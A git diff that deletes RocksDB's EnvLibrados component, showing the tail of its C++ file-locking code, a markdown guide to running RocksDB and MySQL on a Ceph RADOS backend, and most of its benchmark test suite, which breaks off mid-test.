- * @return [description]
- */
-Status EnvLibrados::LinkFile(
-  const std::string& src,
-  const std::string& target_in)
-{
-  LOG_DEBUG("[IO]%s => %s\n", src.c_str(), target_in.c_str());
-  return Status::NotSupported();
-}
-
-/**
- * @brief lock file. create if missing.
- * @details [long description]
- *
- * It seems that LockFile is used for preventing other instance of RocksDB
- * from opening up the database at the same time. From RocksDB source code,
- * the invokes of LockFile are at following locations:
- *
- *  ./db/db_impl.cc:1159:    s = env_->LockFile(LockFileName(dbname_), &db_lock_);    // DBImpl::Recover
- *  ./db/db_impl.cc:5839:  Status result = env->LockFile(lockname, &lock);            // Status DestroyDB
- *
- * When db recovery and db destroy, RocksDB will call LockFile
- *
- * @param fname [description]
- * @param lock [description]
- *
- * @return [description]
- */
-Status EnvLibrados::LockFile(
-  const std::string& fname,
-  FileLock** lock)
-{
-  LOG_DEBUG("[IN]%s\n", fname.c_str());
-  std::string fid, dir, file;
-  split(fname, &dir, &file);
-  Status s = Status::OK();
-
-  do {
-    std::string fpath = dir + "/" + file;
-    s = _GetFid(fpath, fid);
-
-    if (Status::OK() != s &&
-        Status::NotFound() != s) {
-      break;
-    } else if (Status::NotFound() == s) {
-      s = _AddFid(fpath, _CreateFid());
-      if (!s.ok()) {
-        break;
-      }
-    } else if (Status::OK() == s && DIR_ID_VALUE == fid) {
-      s = Status::IOError();
-      break;
-    }
-
-    *lock = new LibradosFileLock(_GetIoctx(fpath), fpath);
-  } while (0);
-
-  LOG_DEBUG("[OUT]%s\n", s.ToString().c_str());
-  return s;
-}
-
-/**
- * @brief unlock file
- * @details [long description]
- *
- * @param lock [description]
- * @return [description]
- */
-Status EnvLibrados::UnlockFile(FileLock* lock)
-{
-  LOG_DEBUG("[IO]%p\n", lock);
-  if (nullptr != lock) {
-    delete lock;
-  }
-  return Status::OK();
-}
-
-
-/**
- * @brief not support
- * @details [long description]
- *
- * @param db_path [description]
- * @param output_path [description]
- *
- * @return [description]
- */
-Status EnvLibrados::GetAbsolutePath(
-  const std::string& db_path,
-  std::string* output_path)
-{
-  LOG_DEBUG("[IO]%s\n", db_path.c_str());
-  return Status::NotSupported();
-}
-
-/**
- * @brief Get default EnvLibrados
- * @details [long description]
- * @return [description]
- */
-EnvLibrados* EnvLibrados::Default() {
-  static EnvLibrados default_env(default_db_name,
-                                 std::getenv(default_config_path),
-                                 default_pool_name);
-  return &default_env;
-}
-}
\ No newline at end of file
diff --git a/thirdparty/rocksdb/utilities/env_librados.md b/thirdparty/rocksdb/utilities/env_librados.md
deleted file mode 100644
index 45a2a7b..0000000
--- a/thirdparty/rocksdb/utilities/env_librados.md
+++ /dev/null
@@ -1,122 +0,0 @@
-# Introduce to EnvLibrados
-EnvLibrados is a customized RocksDB Env to use RADOS as the backend file system of RocksDB. It overrides all file system related API of default Env. The easiest way to use it is just like following:
-```c++
-std::string db_name = "test_db";
-std::string config_path = "path/to/ceph/config";
-DB* db;
-Options options;
-options.env = EnvLibrados(db_name, config_path);
-Status s = DB::Open(options, kDBPath, &db);
-...
-```
-Then EnvLibrados will forward all file read/write operation to the RADOS cluster assigned by config_path. Default pool is db_name+"_pool".
-
-# Options for EnvLibrados
-There are some options that users could set for EnvLibrados.
-- write_buffer_size. This variable is the max buffer size for WritableFile. After reaching the buffer_max_size, EnvLibrados will sync buffer content to RADOS, then clear buffer.
-- db_pool. Rather than using default pool, users could set their own db pool name
-- wal_dir. The dir for WAL files. Because RocksDB only has 2-level structure (dir_name/file_name), the format of wal_dir is "/dir_name"(CAN'T be "/dir1/dir2"). Default wal_dir is "/wal".
-- wal_pool. Corresponding pool name for WAL files. Default value is db_name+"_wal_pool"
-
-The example of setting options looks like following:
-```c++
-db_name = "test_db";
-db_pool = db_name+"_pool";
-wal_dir = "/wal";
-wal_pool = db_name+"_wal_pool";
-write_buffer_size = 1 << 20;
-env_ = new EnvLibrados(db_name, config, db_pool, wal_dir, wal_pool, write_buffer_size);
-
-DB* db;
-Options options;
-options.env = env_;
-// The last level dir name should match the dir name in prefix_pool_map
-options.wal_dir = "/tmp/wal";                    
-
-// open DB
-Status s = DB::Open(options, kDBPath, &db);
-...
-```
-
-# Performance Test
-## Compile
-Check this [link](https://github.com/facebook/rocksdb/blob/master/INSTALL.md) to install the dependencies of RocksDB. Then you can compile it by running `$ make env_librados_test ROCKSDB_USE_LIBRADOS=1` under `rocksdb\`. The configure file used by env_librados_test is `../ceph/src/ceph.conf`. For Ubuntu 14.04, just run following commands:
-```bash
-$ sudo apt-get install libgflags-dev
-$ sudo apt-get install libsnappy-dev
-$ sudo apt-get install zlib1g-dev
-$ sudo apt-get install libbz2-dev
-$ make env_librados_test ROCKSDB_USE_LIBRADOS=1
-```
-
-## Test Result
-My test environment is Ubuntu 14.04 in VirtualBox with 8 cores and 8G RAM. Following is the test result.
-
-1. Write (1<<20) keys in random order. The time of writing under default env is around 10s while the time of writing under EnvLibrados is varying from 10s to 30s.
-
-2. Write (1<<20) keys in sequential order. The time of writing under default env drops to arround 1s. But the time of writing under EnvLibrados is not changed. 
-
-3. Read (1<<16) keys from (1<<20) keys in random order. The time of reading under both Envs are roughly the same, around 1.8s.
-
-# MyRocks Test
-## Compile Ceph
-See [link](http://docs.ceph.com/docs/master/install/build-ceph/)
-
-## Start RADOS
-
-```bash
-cd ceph-path/src
-( ( ./stop.sh; rm -rf dev/*; CEPH_NUM_OSD=3 ./vstart.sh --short --localhost -n
--x -d ; ) ) 2>&1
-```
-
-## Compile MySQL
-
-```bash
-sudo apt-get update
-sudo apt-get install g++ cmake libbz2-dev libaio-dev bison \
-zlib1g-dev libsnappy-dev 
-sudo apt-get install libgflags-dev libreadline6-dev libncurses5-dev \
-libssl-dev liblz4-dev gdb git
-
-git clone https://github.com/facebook/mysql-5.6.git
-cd mysql-5.6
-git submodule init
-git submodule update
-cmake . -DCMAKE_BUILD_TYPE=RelWithDebInfo -DWITH_SSL=system \
--DWITH_ZLIB=bundled -DMYSQL_MAINTAINER_MODE=0 -DENABLED_LOCAL_INFILE=1 -DROCKSDB_USE_LIBRADOS=1
-make install -j8
-```
-
-Check this [link](https://github.com/facebook/mysql-5.6/wiki/Build-Steps) for latest compile steps.
-
-## Configure MySQL
-Following is the steps of configuration of MySQL.
-
-```bash
-mkdir -p /etc/mysql
-mkdir -p /var/lib/mysql
-mkdir -p /etc/mysql/conf.d
-echo -e '[mysqld_safe]\nsyslog' > /etc/mysql/conf.d/mysqld_safe_syslog.cnf
-cp /usr/share/mysql/my-medium.cnf /etc/mysql/my.cnf
-sed -i 's#.*datadir.*#datadir = /var/lib/mysql#g' /etc/mysql/my.cnf
-chown mysql:mysql -R /var/lib/mysql
-
-mysql_install_db --user=mysql --ldata=/var/lib/mysql/
-export CEPH_CONFIG_PATH="path/of/ceph/config/file"
-mysqld_safe -user=mysql --skip-innodb --rocksdb --default-storage-engine=rocksdb --default-tmp-storage-engine=MyISAM &
-mysqladmin -u root password
-mysql -u root -p
-```
-
-Check this [link](https://gist.github.com/shichao-an/f5639ecd551496ac2d70) for detail information.
-
-```sql
-show databases;
-create database testdb;
-use testdb;
-show tables;
-CREATE TABLE tbl (id INT AUTO_INCREMENT primary key, str VARCHAR(32));
-insert into tbl values (1, "val2");
-select * from tbl;
-```
diff --git a/thirdparty/rocksdb/utilities/env_librados_test.cc b/thirdparty/rocksdb/utilities/env_librados_test.cc
deleted file mode 100644
index 7d9b252..0000000
--- a/thirdparty/rocksdb/utilities/env_librados_test.cc
+++ /dev/null
@@ -1,1146 +0,0 @@
-//  Copyright (c) 2016, Red Hat, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/env_librados.h"
-#include <rados/librados.hpp>
-#include "env/mock_env.h"
-#include "util/testharness.h"
-
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/options.h"
-#include "util/random.h"
-#include <chrono>
-#include <ostream>
-#include "rocksdb/utilities/transaction_db.h"
-
-class Timer {
-  typedef std::chrono::high_resolution_clock high_resolution_clock;
-  typedef std::chrono::milliseconds milliseconds;
-public:
-  explicit Timer(bool run = false)
-  {
-    if (run)
-      Reset();
-  }
-  void Reset()
-  {
-    _start = high_resolution_clock::now();
-  }
-  milliseconds Elapsed() const
-  {
-    return std::chrono::duration_cast<milliseconds>(high_resolution_clock::now() - _start);
-  }
-  template <typename T, typename Traits>
-  friend std::basic_ostream<T, Traits>& operator<<(std::basic_ostream<T, Traits>& out, const Timer& timer)
-  {
-    return out << timer.Elapsed().count();
-  }
-private:
-  high_resolution_clock::time_point _start;
-};
-
-namespace rocksdb {
-
-class EnvLibradosTest : public testing::Test {
-public:
-  // we will use all of these below
-  const std::string db_name = "env_librados_test_db";
-  const std::string db_pool = db_name + "_pool";
-  const char *keyring = "admin";
-  const char *config = "../ceph/src/ceph.conf";
-
-  EnvLibrados* env_;
-  const EnvOptions soptions_;
-
-  EnvLibradosTest()
-    : env_(new EnvLibrados(db_name, config, db_pool)) {
-  }
-  ~EnvLibradosTest() {
-    delete env_;
-    librados::Rados rados;
-    int ret = 0;
-    do {
-      ret = rados.init("admin"); // just use the client.admin keyring
-      if (ret < 0) { // let's handle any error that might have come back
-        std::cerr << "couldn't initialize rados! error " << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      ret = rados.conf_read_file(config);
-      if (ret < 0) {
-        // This could fail if the config file is malformed, but it'd be hard.
-        std::cerr << "failed to parse config file " << config
-                  << "! error" << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      /*
-       * next, we actually connect to the cluster
-       */
-
-      ret = rados.connect();
-      if (ret < 0) {
-        std::cerr << "couldn't connect to cluster! error " << ret << std::endl;
-        ret = EXIT_FAILURE;
-        break;
-      }
-
-      /*
-       * And now we're done, so let's remove our pool and then
-       * shut down the connection gracefully.
-       */
-      int delete_ret = rados.pool_delete(db_pool.c_str());
-      if (delete_ret < 0) {
-        // be careful not to
-        std::cerr << "We failed to delete our test pool!" << db_pool << delete_ret << std::endl;
-        ret = EXIT_FAILURE;
-      }
-    } while (0);
-  }
-};
-
-TEST_F(EnvLibradosTest, Basics) {
-  uint64_t file_size;
-  unique_ptr<WritableFile> writable_file;
-  std::vector<std::string> children;
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-  // Check that the directory is empty.
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/non_existent"));
-  ASSERT_TRUE(!env_->GetFileSize("/dir/non_existent", &file_size).ok());
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(0U, children.size());
-
-  // Create a file.
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  writable_file.reset();
-
-  // Check that the file exists.
-  ASSERT_OK(env_->FileExists("/dir/f"));
-  ASSERT_OK(env_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(0U, file_size);
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(1U, children.size());
-  ASSERT_EQ("f", children[0]);
-
-  // Write to the file.
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("abc"));
-  writable_file.reset();
-
-
-  // Check for expected size.
-  ASSERT_OK(env_->GetFileSize("/dir/f", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-
-  // Check that renaming works.
-  ASSERT_TRUE(!env_->RenameFile("/dir/non_existent", "/dir/g").ok());
-  ASSERT_OK(env_->RenameFile("/dir/f", "/dir/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/f"));
-  ASSERT_OK(env_->FileExists("/dir/g"));
-  ASSERT_OK(env_->GetFileSize("/dir/g", &file_size));
-  ASSERT_EQ(3U, file_size);
-
-  // Check that opening non-existent file fails.
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  ASSERT_TRUE(
-    !env_->NewSequentialFile("/dir/non_existent", &seq_file, soptions_).ok());
-  ASSERT_TRUE(!seq_file);
-  ASSERT_TRUE(!env_->NewRandomAccessFile("/dir/non_existent", &rand_file,
-                                         soptions_).ok());
-  ASSERT_TRUE(!rand_file);
-
-  // Check that deleting works.
-  ASSERT_TRUE(!env_->DeleteFile("/dir/non_existent").ok());
-  ASSERT_OK(env_->DeleteFile("/dir/g"));
-  ASSERT_EQ(Status::NotFound(), env_->FileExists("/dir/g"));
-  ASSERT_OK(env_->GetChildren("/dir", &children));
-  ASSERT_EQ(0U, children.size());
-  ASSERT_OK(env_->DeleteDir("/dir"));
-}
-
-TEST_F(EnvLibradosTest, ReadWrite) {
-  unique_ptr<WritableFile> writable_file;
-  unique_ptr<SequentialFile> seq_file;
-  unique_ptr<RandomAccessFile> rand_file;
-  Slice result;
-  char scratch[100];
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("hello "));
-  ASSERT_OK(writable_file->Append("world"));
-  writable_file.reset();
-
-  // Read sequentially.
-  ASSERT_OK(env_->NewSequentialFile("/dir/f", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(seq_file->Skip(1));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));  // Try reading past EOF.
-  ASSERT_EQ(0U, result.size());
-  ASSERT_OK(seq_file->Skip(100));  // Try to skip past end of file.
-  ASSERT_OK(seq_file->Read(1000, &result, scratch));
-  ASSERT_EQ(0U, result.size());
-
-  // Random reads.
-  ASSERT_OK(env_->NewRandomAccessFile("/dir/f", &rand_file, soptions_));
-  ASSERT_OK(rand_file->Read(6, 5, &result, scratch));  // Read "world".
-  ASSERT_EQ(0, result.compare("world"));
-  ASSERT_OK(rand_file->Read(0, 5, &result, scratch));  // Read "hello".
-  ASSERT_EQ(0, result.compare("hello"));
-  ASSERT_OK(rand_file->Read(10, 100, &result, scratch));  // Read "d".
-  ASSERT_EQ(0, result.compare("d"));
-
-  // Too high offset.
-  ASSERT_OK(rand_file->Read(1000, 5, &result, scratch));
-}
-
-TEST_F(EnvLibradosTest, Locks) {
-  FileLock* lock = nullptr;
-  unique_ptr<WritableFile> writable_file;
-
-  ASSERT_OK(env_->CreateDir("/dir"));
-
-  ASSERT_OK(env_->NewWritableFile("/dir/f", &writable_file, soptions_));
-
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(env_->LockFile("some file", &lock));
-  ASSERT_OK(env_->UnlockFile(lock));
-
-  ASSERT_OK(env_->LockFile("/dir/f", &lock));
-  ASSERT_OK(env_->UnlockFile(lock));
-}
-
-TEST_F(EnvLibradosTest, Misc) {
-  std::string test_dir;
-  ASSERT_OK(env_->GetTestDirectory(&test_dir));
-  ASSERT_TRUE(!test_dir.empty());
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_TRUE(!env_->NewWritableFile("/a/b", &writable_file, soptions_).ok());
-
-  ASSERT_OK(env_->NewWritableFile("/a", &writable_file, soptions_));
-  // These are no-ops, but we test they return success.
-  ASSERT_OK(writable_file->Sync());
-  ASSERT_OK(writable_file->Flush());
-  ASSERT_OK(writable_file->Close());
-  writable_file.reset();
-}
-
-TEST_F(EnvLibradosTest, LargeWrite) {
-  const size_t kWriteSize = 300 * 1024;
-  char* scratch = new char[kWriteSize * 2];
-
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, 'h');
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->CreateDir("/dir"));
-  ASSERT_OK(env_->NewWritableFile("/dir/g", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("foo"));
-  ASSERT_OK(writable_file->Append(write_data));
-  writable_file.reset();
-
-  unique_ptr<SequentialFile> seq_file;
-  Slice result;
-  ASSERT_OK(env_->NewSequentialFile("/dir/g", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(3, &result, scratch));  // Read "foo".
-  ASSERT_EQ(0, result.compare("foo"));
-
-  size_t read = 0;
-  std::string read_data;
-  while (read < kWriteSize) {
-    ASSERT_OK(seq_file->Read(kWriteSize - read, &result, scratch));
-    read_data.append(result.data(), result.size());
-    read += result.size();
-  }
-  ASSERT_TRUE(write_data == read_data);
-  delete[] scratch;
-}
-
-TEST_F(EnvLibradosTest, FrequentlySmallWrite) {
-  const size_t kWriteSize = 1 << 10;
-  char* scratch = new char[kWriteSize * 2];
-
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, 'h');
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->CreateDir("/dir"));
-  ASSERT_OK(env_->NewWritableFile("/dir/g", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append("foo"));
-
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    ASSERT_OK(writable_file->Append("h"));
-  }
-  writable_file.reset();
-
-  unique_ptr<SequentialFile> seq_file;
-  Slice result;
-  ASSERT_OK(env_->NewSequentialFile("/dir/g", &seq_file, soptions_));
-  ASSERT_OK(seq_file->Read(3, &result, scratch));  // Read "foo".
-  ASSERT_EQ(0, result.compare("foo"));
-
-  size_t read = 0;
-  std::string read_data;
-  while (read < kWriteSize) {
-    ASSERT_OK(seq_file->Read(kWriteSize - read, &result, scratch));
-    read_data.append(result.data(), result.size());
-    read += result.size();
-  }
-  ASSERT_TRUE(write_data == read_data);
-  delete[] scratch;
-}
-
-TEST_F(EnvLibradosTest, Truncate) {
-  const size_t kWriteSize = 300 * 1024;
-  const size_t truncSize = 1024;
-  std::string write_data;
-  for (size_t i = 0; i < kWriteSize; ++i) {
-    write_data.append(1, 'h');
-  }
-
-  unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env_->CreateDir("/dir"));
-  ASSERT_OK(env_->NewWritableFile("/dir/g", &writable_file, soptions_));
-  ASSERT_OK(writable_file->Append(write_data));
-  ASSERT_EQ(writable_file->GetFileSize(), kWriteSize);
-  ASSERT_OK(writable_file->Truncate(truncSize));
-  ASSERT_EQ(writable_file->GetFileSize(), truncSize);
-  writable_file.reset();
-}
-
-TEST_F(EnvLibradosTest, DBBasics) {
-  std::string kDBPath = "/tmp/DBBasics";
-  DB* db;
-  Options options;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options.IncreaseParallelism();
-  options.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options.create_if_missing = true;
-  options.env = env_;
-
-  // open DB
-  Status s = DB::Open(options, kDBPath, &db);
-  assert(s.ok());
-
-  // Put key-value
-  s = db->Put(WriteOptions(), "key1", "value");
-  assert(s.ok());
-  std::string value;
-  // get value
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.ok());
-  assert(value == "value");
-
-  // atomically apply a set of updates
-  {
-    WriteBatch batch;
-    batch.Delete("key1");
-    batch.Put("key2", value);
-    s = db->Write(WriteOptions(), &batch);
-  }
-
-  s = db->Get(ReadOptions(), "key1", &value);
-  assert(s.IsNotFound());
-
-  db->Get(ReadOptions(), "key2", &value);
-  assert(value == "value");
-
-  delete db;
-}
-
-TEST_F(EnvLibradosTest, DBLoadKeysInRandomOrder) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 10;
-  Timer timer(false);
-  std::cout << "Test size : loop(" << max_loop << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBLoadKeysInRandomOrder1";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    snprintf(key,
-             20,
-             "%16lx",
-             (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-    snprintf(value,
-             20,
-             "%16lx",
-             (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-    // Put key-value
-    s1 = db1->Put(WriteOptions(), key, value);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBLoadKeysInRandomOrder2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    snprintf(key,
-             20,
-             "%16lx",
-             (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-    snprintf(value,
-             20,
-             "%16lx",
-             (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-    // Put key-value
-    s2 = db2->Put(WriteOptions(), key, value);
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-TEST_F(EnvLibradosTest, DBBulkLoadKeysInRandomOrder) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 6;
-  int bulk_size = 1 << 15;
-  Timer timer(false);
-  std::cout << "Test size : loop(" << max_loop << "); bulk_size(" << bulk_size << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBBulkLoadKeysInRandomOrder1";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s1 = db1->Write(WriteOptions(), &batch);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBBulkLoadKeysInRandomOrder2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s2 = db2->Write(WriteOptions(), &batch);
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-TEST_F(EnvLibradosTest, DBBulkLoadKeysInSequentialOrder) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 6;
-  int bulk_size = 1 << 15;
-  Timer timer(false);
-  std::cout << "Test size : loop(" << max_loop << "); bulk_size(" << bulk_size << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBBulkLoadKeysInSequentialOrder1";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%019lld",
-               (long long)(i * bulk_size + j));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s1 = db1->Write(WriteOptions(), &batch);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBBulkLoadKeysInSequentialOrder2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  timer.Reset();
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s2 = db2->Write(WriteOptions(), &batch);
-    assert(s2.ok());
-  }
-  std::cout << "Time by librados : " << timer << "ms" << std::endl;
-  delete db2;
-}
-
-TEST_F(EnvLibradosTest, DBRandomRead) {
-  char key[20] = {0}, value[20] = {0};
-  int max_loop = 1 << 6;
-  int bulk_size = 1 << 10;
-  int read_loop = 1 << 20;
-  Timer timer(false);
-  std::cout << "Test size : keys_num(" << max_loop << ", " << bulk_size << "); read_loop(" << read_loop << ")" << std::endl;
-  /**********************************
-            use default env
-  ***********************************/
-  std::string kDBPath1 = "/tmp/DBRandomRead1";
-  DB* db1;
-  Options options1;
-  // Optimize Rocksdb. This is the easiest way to get RocksDB to perform well
-  options1.IncreaseParallelism();
-  options1.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options1.create_if_missing = true;
-
-  // open DB
-  Status s1 = DB::Open(options1, kDBPath1, &db1);
-  assert(s1.ok());
-
-  rocksdb::Random64 r1(time(nullptr));
-
-
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%019lld",
-               (long long)(i * bulk_size + j));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r1.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s1 = db1->Write(WriteOptions(), &batch);
-    assert(s1.ok());
-  }
-  timer.Reset();
-  int base1 = 0, offset1 = 0;
-  for (int i = 0; i < read_loop; ++i) {
-    base1 = r1.Uniform(max_loop);
-    offset1 = r1.Uniform(bulk_size);
-    std::string value1;
-    snprintf(key,
-             20,
-             "%019lld",
-             (long long)(base1 * bulk_size + offset1));
-    s1 = db1->Get(ReadOptions(), key, &value1);
-    assert(s1.ok());
-  }
-  std::cout << "Time by default : " << timer << "ms" << std::endl;
-  delete db1;
-
-  /**********************************
-            use librados env
-  ***********************************/
-  std::string kDBPath2 = "/tmp/DBRandomRead2";
-  DB* db2;
-  Options options2;
-  // Optimize RocksDB. This is the easiest way to get RocksDB to perform well
-  options2.IncreaseParallelism();
-  options2.OptimizeLevelStyleCompaction();
-  // create the DB if it's not already present
-  options2.create_if_missing = true;
-  options2.env = env_;
-
-  // open DB
-  Status s2 = DB::Open(options2, kDBPath2, &db2);
-  assert(s2.ok());
-
-  rocksdb::Random64 r2(time(nullptr));
-
-  for (int i = 0; i < max_loop; ++i) {
-    WriteBatch batch;
-    for (int j = 0; j < bulk_size; ++j) {
-      snprintf(key,
-               20,
-               "%019lld",
-               (long long)(i * bulk_size + j));
-      snprintf(value,
-               20,
-               "%16lx",
-               (unsigned long)r2.Uniform(std::numeric_limits<uint64_t>::max()));
-      batch.Put(key, value);
-    }
-    s2 = db2->Write(WriteOptions(), &batch);
-    assert(s2.ok());
-  }
-
-  timer.Reset();
-  int base2 = 0, offset2 = 0;
-  for (int i = 0; i < read_loop; ++i) {
-    base2 = r2.Uniform(max_loop);
-    offset2 = r2.Uniform(bulk_size);
-    std::string value2;
-    snprintf(key,
-             20,
-             "%019lld",
-             (long long)(base2 * bulk_size + offset2));
-    s2 = db2->Get(ReadOptions(), key, &value2);
-    if (!s2.ok()) {
